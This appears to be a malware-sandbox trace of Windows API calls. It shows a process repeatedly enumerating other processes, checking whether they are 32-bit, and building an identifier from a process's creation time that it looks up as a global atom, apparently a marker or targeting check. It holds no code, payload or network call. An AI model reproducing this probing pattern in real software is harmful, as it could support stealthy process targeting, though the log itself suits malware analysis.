	[0118.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.497] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.497] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.497] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.497] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.497] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.498] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.498] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.498] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.498] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.498] CloseHandle (hObject=0x698) returned 1
	[0118.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.498] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.498] CloseHandle (hObject=0x698) returned 1
	[0118.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.498] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.498] CloseHandle (hObject=0x698) returned 1
	[0118.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.499] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.499] CloseHandle (hObject=0x698) returned 1
	[0118.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.533] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.533] CloseHandle (hObject=0x698) returned 1
	[0118.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.534] CloseHandle (hObject=0x698) returned 1
	[0118.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.534] CloseHandle (hObject=0x698) returned 1
	[0118.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.535] CloseHandle (hObject=0x698) returned 1
	[0118.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.535] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.535] CloseHandle (hObject=0x698) returned 1
	[0118.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.535] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.535] CloseHandle (hObject=0x698) returned 1
	[0118.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.535] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.535] CloseHandle (hObject=0x698) returned 1
	[0118.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.535] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.535] CloseHandle (hObject=0x698) returned 1
	[0118.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.536] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.536] CloseHandle (hObject=0x698) returned 1
	[0118.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.536] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.536] CloseHandle (hObject=0x698) returned 1
	[0118.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.537] CloseHandle (hObject=0x698) returned 1
	[0118.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.537] CloseHandle (hObject=0x698) returned 1
	[0118.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.537] CloseHandle (hObject=0x698) returned 1
	[0118.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.537] CloseHandle (hObject=0x698) returned 1
	[0118.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.537] CloseHandle (hObject=0x698) returned 1
	[0118.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.538] CloseHandle (hObject=0x698) returned 1
	[0118.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.538] CloseHandle (hObject=0x698) returned 1
	[0118.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.538] CloseHandle (hObject=0x698) returned 1
	[0118.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.538] CloseHandle (hObject=0x698) returned 1
	[0118.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.539] CloseHandle (hObject=0x698) returned 1
	[0118.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.539] CloseHandle (hObject=0x698) returned 1
	[0118.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.539] CloseHandle (hObject=0x698) returned 1
	[0118.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.539] CloseHandle (hObject=0x698) returned 1
	[0118.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.539] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.539] CloseHandle (hObject=0x698) returned 1
	[0118.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.540] CloseHandle (hObject=0x698) returned 1
	[0118.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.540] CloseHandle (hObject=0x698) returned 1
	[0118.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.540] CloseHandle (hObject=0x698) returned 1
	[0118.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.540] CloseHandle (hObject=0x698) returned 1
	[0118.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.540] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.541] CloseHandle (hObject=0x698) returned 1
	[0118.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.541] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.541] CloseHandle (hObject=0x698) returned 1
	[0118.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.541] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.541] CloseHandle (hObject=0x698) returned 1
	[0118.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.542] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.542] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.542] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.542] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.542] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.543] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.543] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.543] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.543] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.543] CloseHandle (hObject=0x698) returned 1
	[0118.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.543] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.543] CloseHandle (hObject=0x698) returned 1
	[0118.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.543] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.543] CloseHandle (hObject=0x698) returned 1
	[0118.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.544] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.544] CloseHandle (hObject=0x698) returned 1
	[0118.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0118.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0118.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0118.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0118.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0118.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0118.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0118.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0118.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0118.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0118.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0118.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0118.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0118.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0118.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0118.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0118.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0118.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0118.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0118.579] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.579] CloseHandle (hObject=0x698) returned 1
	[0118.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0118.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0118.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0118.579] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.580] CloseHandle (hObject=0x698) returned 1
	[0118.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0118.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0118.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.580] CloseHandle (hObject=0x698) returned 1
	[0118.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0118.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.580] CloseHandle (hObject=0x698) returned 1
	[0118.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0118.580] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.580] CloseHandle (hObject=0x698) returned 1
	[0118.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0118.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.581] CloseHandle (hObject=0x698) returned 1
	[0118.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0118.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.581] CloseHandle (hObject=0x698) returned 1
	[0118.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0118.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.581] CloseHandle (hObject=0x698) returned 1
	[0118.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0118.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0118.581] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.581] CloseHandle (hObject=0x698) returned 1
	[0118.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0118.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.582] CloseHandle (hObject=0x698) returned 1
	[0118.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0118.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.582] CloseHandle (hObject=0x698) returned 1
	[0118.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0118.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.582] CloseHandle (hObject=0x698) returned 1
	[0118.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0118.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.582] CloseHandle (hObject=0x698) returned 1
	[0118.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0118.582] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.582] CloseHandle (hObject=0x698) returned 1
	[0118.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0118.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.583] CloseHandle (hObject=0x698) returned 1
	[0118.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0118.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.583] CloseHandle (hObject=0x698) returned 1
	[0118.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0118.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.583] CloseHandle (hObject=0x698) returned 1
	[0118.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0118.583] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.583] CloseHandle (hObject=0x698) returned 1
	[0118.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0118.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.584] CloseHandle (hObject=0x698) returned 1
	[0118.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0118.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.584] CloseHandle (hObject=0x698) returned 1
	[0118.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0118.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.584] CloseHandle (hObject=0x698) returned 1
	[0118.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0118.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.584] CloseHandle (hObject=0x698) returned 1
	[0118.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0118.584] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.584] CloseHandle (hObject=0x698) returned 1
	[0118.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0118.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.585] CloseHandle (hObject=0x698) returned 1
	[0118.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0118.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.585] CloseHandle (hObject=0x698) returned 1
	[0118.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0118.585] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.585] CloseHandle (hObject=0x698) returned 1
	[0118.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0118.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.586] CloseHandle (hObject=0x698) returned 1
	[0118.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0118.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.586] CloseHandle (hObject=0x698) returned 1
	[0118.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0118.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.586] CloseHandle (hObject=0x698) returned 1
	[0118.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0118.586] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.586] CloseHandle (hObject=0x698) returned 1
	[0118.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.587] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.587] CloseHandle (hObject=0x698) returned 1
	[0118.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0118.587] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.587] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0118.587] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0118.587] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0118.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.588] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0118.588] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0118.588] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0118.588] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0118.588] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0118.589] CloseHandle (hObject=0x698) returned 1
	[0118.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0118.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0118.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.589] CloseHandle (hObject=0x698) returned 1
	[0118.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0118.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0118.589] CloseHandle (hObject=0x698) returned 1
	[0118.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0118.589] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
